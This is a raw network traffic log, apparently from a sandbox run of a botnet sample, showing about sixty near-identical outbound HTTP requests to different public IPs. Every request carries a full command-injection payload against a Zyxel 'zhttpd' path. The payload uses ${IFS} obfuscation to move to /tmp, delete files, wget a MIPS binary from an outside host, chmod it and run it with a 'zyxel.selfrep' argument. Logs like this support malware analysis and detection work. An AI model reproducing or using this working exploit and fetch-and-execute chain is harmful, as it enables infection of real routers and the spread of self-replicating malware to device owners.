                                                Jan 12, 2024 18:24:45.080099106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6679192.168.2.1346736203.214.160.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080149889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6680192.168.2.1353010138.205.213.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080189943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6681192.168.2.134289063.207.130.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080255032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6682192.168.2.1356916112.202.57.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080307007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6683192.168.2.1358298200.98.177.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080370903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6684192.168.2.134696089.174.126.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080414057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6685192.168.2.133645623.183.139.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080483913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6686192.168.2.1358510193.84.70.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080518961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6687192.168.2.1352240101.124.94.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080583096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6688192.168.2.1332944174.160.172.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080648899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6689192.168.2.134792483.218.32.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080713987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6690192.168.2.1345696103.113.41.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080737114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6691192.168.2.1347212117.26.220.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080821991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6692192.168.2.1343154194.51.119.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080873966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6693192.168.2.1360082172.80.67.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080938101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6694192.168.2.1357006131.136.169.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080992937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6695192.168.2.1340992204.100.194.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081051111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6696192.168.2.1336134179.117.150.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081105947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6697192.168.2.1342222122.180.70.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081167936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6698192.168.2.1340322119.121.19.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081198931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6699192.168.2.1342782101.113.163.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081268072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6700192.168.2.1353434159.134.166.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081331968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6701192.168.2.1360120167.84.36.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081366062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6702192.168.2.1333042199.246.204.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081415892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6703192.168.2.1356226216.51.37.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081478119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6704192.168.2.133527669.177.100.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081530094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6705192.168.2.134391436.238.144.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081588030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6706192.168.2.1348356171.228.180.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081626892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6707192.168.2.1346128178.32.231.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081655979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6708192.168.2.1341310104.222.14.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081738949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6709192.168.2.1348950112.232.187.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081794024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6710192.168.2.1359950170.176.18.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081856012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6711192.168.2.1349812213.165.158.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081909895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6712192.168.2.1353346181.187.62.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.081964970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6713192.168.2.1347782196.35.173.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082045078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6714192.168.2.1336040206.92.119.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082098007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6715192.168.2.1342634170.149.193.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082124949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6716192.168.2.1341414200.127.149.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082184076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6717192.168.2.1337884175.36.215.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082262993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6718192.168.2.1334734217.225.143.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082298994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6719192.168.2.134845050.15.197.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082369089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6720192.168.2.1342412134.35.87.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082422972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6721192.168.2.134799683.18.155.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082464933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6722192.168.2.1356004137.249.154.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082493067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6723192.168.2.133882031.70.196.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082583904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6724192.168.2.133432873.233.87.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082628965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6725192.168.2.134575862.201.209.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082650900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6726192.168.2.133786240.246.238.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082721949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6727192.168.2.1334460187.177.143.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082765102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6728192.168.2.1338096204.70.179.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082801104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6729192.168.2.1341236135.77.74.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082879066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6730192.168.2.1337642143.108.162.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082921982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6731192.168.2.135798445.2.124.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.082994938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6732192.168.2.135610883.156.206.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083039045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6733192.168.2.1355716133.45.8.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083081007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6734192.168.2.13369361.202.121.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083116055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6735192.168.2.1352648142.44.16.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083177090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6736192.168.2.1336852192.234.247.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083236933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6737192.168.2.1351878200.114.245.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083313942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6738192.168.2.135084289.54.136.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083368063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6739192.168.2.133757237.150.161.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083430052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6740192.168.2.1355722111.193.8.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083452940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6741192.168.2.135418820.27.174.132443
                                                TimestampBytes transferredDirectionData
